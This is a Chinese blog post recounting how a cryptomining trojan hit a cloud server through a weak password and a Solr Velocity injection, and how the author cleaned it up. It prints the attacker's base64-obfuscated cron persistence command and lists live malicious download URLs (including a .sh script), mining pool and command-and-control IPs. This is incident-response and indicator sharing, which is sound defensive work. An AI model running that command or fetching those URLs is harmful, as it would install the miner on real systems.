以前玩过腾讯,阿里,华为的免费服务器,都是又卡又慢,身为22世纪祖国的花朵,经过知识付费的薰陶,我义无反顾的终止了我的白嫖行为,然而努力让自己变得更好的路上总是有各种坑。。。。
服务器背景:
操作环境背景:
操作系统:Windows 10
操作工具:xshell(Free for Home/school)
故事背景:
拿到服务器后,自己创建了一个普通用户:shaun ;密码:123456
(我承认我懒,所以设了这个连号密码,但这个该死的挖矿程序把我心态搞炸了,他要是不搞我的程序,让我还能玩,我都懒得搞他,但是我搭建的程序都GG了,所以不得不花费一天时间来记录一下,菜鸡的垂死挣扎全过程)
一个多月都是用普通用户在瞎捣鼓,有一天习惯的ssh登录,然而不幸的事情发生了,一直登陆不上。(后来证明还有Apache Solr Velocity模板注入问题)
(当时没截图,以下图片都是后来的)
解决方法:
根据菜鸡生存手册第一条:百度一下,你就知道。
虽然没解决但是提供了点思路,使用root成功登陆服务器,
发现些许猫腻
甜蜜的!这台服务器上什么都没有运行,跑这些干啥玩意捏,经过简单的kill 命令,发现杀不完。
看了一下定时任务果然:(当时没截图,以下图片都是后来的)
定时任务的脚本:
/bin/sh -c echo -n "KCB3aGlsZSA6IDsgZG8gc2xlZXAgNSA7IGlmICEga2lsbCAtMCA5MjI2ID4vZGV2L251bGwgMj4mMSA7IHRoZW4gL2hvbWUvc2hhdW4vYnZ4Y3Z3ID4vZGV2L251bGwgMj4mMSA7IGZpIDsgZG9uZSApICYgcGlkPSQhIDsgKHNsZWVwIDEwICYmIGtpbGwgLTkgJHBpZCkgJg==" | base64 -d | sh >/dev/null 2>&1
while 循环!这是每一个小时不留痕迹的循环搞事情呀。。。
此时已经知道中了挖矿木马病毒,甜蜜的,这种级别的已经不是我这种菜鸡可以解决的了,登录阿里云官网看了一下,
因为穷所以没有快照,有钱的小伙伴一定要搞个快照,但是也要小心,别把病毒也快照进去了。
最偷懒的解决发法:重装系统(想要根除病毒太难了,初始化一下就完事了),无非就是数据的问题,不怕直接重装;
阿里云官方教程:https://help.aliyun.com/document_detail/25449.html
初始化30分钟都不到;重新安装java,mysql,应用程序,恢复数据等,最重要的是重新设置了超复杂密码,以上问题解决一共花费清明节三天时间,反正受疫情影响,也出不去,只能这样安慰自己。
shaun:挖矿木马程序,你没想到吧,解决你只要几分钟,格式化一下就好了
以上全部内容,此致敬礼! (大佬们看到这里就可以了,这也是官方推荐的解决方法,下面的是菜鸡的左右互搏苦苦挣扎。)
再一天后,又是习惯的ssh登录,还是原来的配方,还是熟悉的味道,加夕。。。。(跑题了)
解决方法:
根据菜鸡生存手册第一条:百度一下,你京
挖矿木马:你没想到吧,我又回来了!
shaun:我去年买了个表!
人生不如意,十有八九。本以为逃过一劫,
好吧,这辈子劳碌的命。。。
1.root登录
2.查看指定用户是否有定时任务:
crontab -l -u shaun
3.删除此用户的定时任务:
crontab -r -u shaun
4.查看此用户的定时任务文件:
cd /var/spool/cron/
5.通过 ll 找到 shaun的定时任务文件,直接 rm -rf shaun
6.因为神秘力量,所以会不停的创建shaun 的定时任务,你删了,过会又出来了。所以此时我们要走病毒的路,让他无路可走。
根据Linux下一切都是文件,一个目录归根到底还是一个文件,所以同一目录内文件和目录不能同名!
个人操作:所以创建一个目录 名为shaun,让他没有办法创建名为shaun的定时任务文件。
7.在次查看指定用户是否有定时任务:
crontab -l -u shaun
8.在来一套七伤拳打发,检测cron定时服务是否自启用:
systemctl is-enabled crond.service
结果展示如下:
enable表示已启用自启动
disable标识未启用自启动
9.如果已经启用,关闭cron自启动:
systemctl disable crond.service
10.停止cron服务[命令没有提示]:
systemctl stop crond.service
11.查看cron服务的启动状态:
systemctl status crond.service
[只有cron的状态是active running的,才表示cron服务是启动的]
12.至此定时任务,应该停止了。可以查看一下有哪些正在运行的进程,kill掉不正常的就OK了。
ps -ef |grep shaun
13.修改 shaun 用户的登录密码
passwd shaun
14.重新试了一下shaun 登录,可以登陆了。灰常开心,终于不要初始化了。
应该找售后解决问题,我不能抢人家饭碗呀。
总结:养成备份的好习惯,最好使用快照备份,就是注意别把病毒也备份进去。
像我一样如果就是想玩玩,可以自己先和病毒玩玩,自认为技术过关,病毒查杀干干净净了,可以不用初始化。
如果和我一样是小白那最后还是初始化(格式化),此方法最麻烦的就是如何恢复数据了。
在此感谢这三个网站提供的思路:
https://www.w3xue.com/exp/article/20199/53730.html
https://zhuanlan.zhihu.com/p/85731835
https://www.cnblogs.com/hack404/p/11464890.html
Tips:要想生活过得去,所有检查都得绿。
1.贴出恶意下载源(我已经把这个ip,不论入站还是出站都拒绝访问了)
(千万别点,会自动下载一个东东到你的电脑,我没研究):http://82.146.36.205/sites/default/files/maps
2.贴出矿池IP:157.245.228.211 ;矿池端口:80
3.web攻击, Apache Solr Velocity模板远程命令执行漏洞
请求时间:2020-04-07 18:07:26
攻击者IP:194.99.104.130
暂时修改建议: 限制互联网用户对solr admin的访问!
其他 恶意IP很多,不管是不是肉鸡,我是宁错杀不放过。
高危链接:本人在此声明,仅供学习参考,有任何问题,与本文,本人无关。
http://35.168.165.151/sites/default/files/maps
http://82.146.36.205/sites/default/files/maps
攻击者IP:194.99.104.130
矿池IP:157.245.228.211
矿池IP:157.245.149.66
中控IP:134.209.81.199
中控IP:157.245.149.66
攻击者IP:212.8.247.179
URL链接:http://217.12.221.244/s.sh
最后结束语:
与天斗,与地斗,与人斗,其乐无穷!